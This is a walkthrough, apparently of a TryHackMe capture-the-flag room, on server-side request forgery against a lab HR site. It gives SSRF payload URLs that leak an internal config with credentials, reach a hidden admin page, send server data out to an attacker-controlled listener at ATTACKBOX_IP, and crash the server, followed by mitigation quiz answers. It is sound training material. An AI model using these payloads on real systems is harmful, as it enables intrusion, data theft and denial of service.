SSRF

Discover the inner workings of SSRF and explore multiple exploitation techniques.

SSRF is a web application security vulnerability that allows the attacker to force the server to make unauthorised requests to any local or external source on behalf of the web server. SSRF allows an attacker to interact with internal systems, potentially leading to data leaks, service disruption, or even remote code execution.

Task 1 Introduction

Learning Objectives

Understanding the workings of SSRF
Practically testing various types of SSRF
Few important tools for exploitation
Key mitigation and defensive measures

Task 2 Anatomy of SSRF Attack

What is the average weighted impact for the SSRF vulnerability as per the OWASP Top 10?
Answer can be found in the table with a little bit of reading.

Task 3 Types of SSRF - Basic

Basic SSRF is a web attack technique where an attacker tricks a server into making requests on their behalf, often targeting internal systems or third-party services. By exploiting vulnerabilities in input validation, the attacker can gain unauthorised access to sensitive information or control over remote resources, posing a significant security risk to the targeted application and its underlying infrastructure.

Fairly straight forward. Follow the instructions given in the room and you should get the answers.

Change the link http://hrms.thm/?url=localhost/copyright to http://hrms.thm/?url=localhost/config as instructed. This should give you the answers to the questions.

Answer the questions below

What is the username for the HRMS login panel?
[REDACTED]
Can be found after changing to config.

What is the password for the HRMS login panel?
[REDACTED]
Can be found after changing to config.

What is the admin URL as per the config file?
[REDACTED]
Can be found after changing to config.

What is the flag value after successfully logging in to the HRMS web panel?
[REDACTED]
Cane be found after logging in with the details found.

Task 4 Types of SSRF - Basic (Continued)

Follow the given instructions.

From previous task we know there exists admin.php. We cannot acces it directly.

We can check the source of the HTML, the dropdown takes the URL from an internal system and renders the data. The details of all employees are being rendered from http://192.168.2.10/employees.php and http://192.168.2.10/salary.php.

We can change this to /admin.php. Once the value is updated we can choose that in the drop down menu and we should get our flag.

Answer the questions below

Is accessing non-routable addresses possible if a server is vulnerable to SSRF (yea/nay)?
yea

What is the flag value after accessing the admin panel?
[REDACTED]
Can be found after following the given steps.

Task 5 Types of SSRF - Blind

Blind SSRF refers to a scenario where the attacker can send requests to a target server, but they do not receive direct responses or feedback about the outcome of their requests. In other words, the attacker is blind to the server's responses.

This type of SSRF can be more challenging to exploit because the attacker cannot directly see the results of their actions. We will discuss its various examples.

Out-of-band SSRF is a technique where the attacker leverages a separate, out-of-band communication channel instead of directly receiving responses from the target server to receive information or control the exploited server.

This approach is practical when the server's responses are not directly accessible to the attacker.

This again is a fairly straightforward. Follow all the instructions given.

How it works

Once again, log in to the dashboard and click on the Profile tab in the navigation bar. We will see that it redirects to http://hrms.thm/profile.php?url=localhost/getInfo.php, which displays a message that data is being sent.

What is happening here? Once we load profile.php, it sends data to an external page named getInfo.php, which is probably used for analytics or logs.
Here, an attacker can redirect the request to their server, thus getting additional information about the server for exploitation or data pilferage.
Create server.py as instructed with the code that is given.
The given code will receive all the content and save it to a file data.html on the server.
Now open the browser and open http://hrms.thm/profile.php?url=http://ATTACKBOX_IP:8080, which will log the data in the data.html. data.html file, which contains all the essential information related to the server that can be used to launch further attacks.

Answer the questions below

Does Out-of-band SSRF always include a technique in which an attacker always receives direct responses from the server (yea/nay)?
nay

What is the value for Virtual Directory Support on the PHP server per the logged data?
[REDACTED]
Can be found in data.html

What is the value of the PHP Extension Build on the server?
[REDACTED]
Can be found in data.html

Which type of SSRF doesn't give us a direct response or feedback?
Blind

Task 6 A Classic Example - Crashing the Server

One scenario and attacker could abuse SSRF, is by crashing the server or creating a denial of service for other hosts.

There are multiple instances (WordPress, CairoSVG) where attackers try to disrupt the availability of a system by launching SSRF attacks. We will see how a complete server crash can occur through forged requests to a vulnerable server.

Again very straightforward instructions.

How it works

Once we log in to the dashboard, we will see a tab called Training in the navigation bar, which is used to load the training content for the employees.
Once we click on that tab, we will see that it redirects to the URL http://hrms.thm/url.php=192.168.2.10/trainingbanner.jpg, which shows training content.

We notice that the url.php file is loading external content displayed here. What if we try to load any other content?
Try opening the file http://hrms.thm/url.php?id=10.10.10.10. Great! - it opened the file for you.

Now that we know the server is vulnerable to basic SSRF, let's explore the code of url.php to make it crash the server.
The above code shows that the url.php loads an image; if the image size exceeds 100KB, it shows a memory outage message and throws an error.
Let's try to crash the server by loading an image greater than 100 KB. For your convenience, we already have such an image available, which you can forge via http://hrms.thm/url.php?id=192.168.2.10/bigImage.jpg.

Answer the questions below

What is the flag value after loading a big image exceeding 100KB?
[REDACTED]
Can be found after crashing the image server by following the instructions.

Task 7 Remedial Measures

Answer the questions below

Which of the following is the suggested approach while handling trusted URLs? Write the correct option only.
a) Filter out disallowed URLs
b) Maintaining an allowlist of trusted URLs

b

Since SSRF mainly exploits server-side requests, is it optional to sanitise the input URLs or parameters (yea/nay)?
nay

PreviousUmbrella NextCapture!

Last updated 1 year ago

Was this helpful?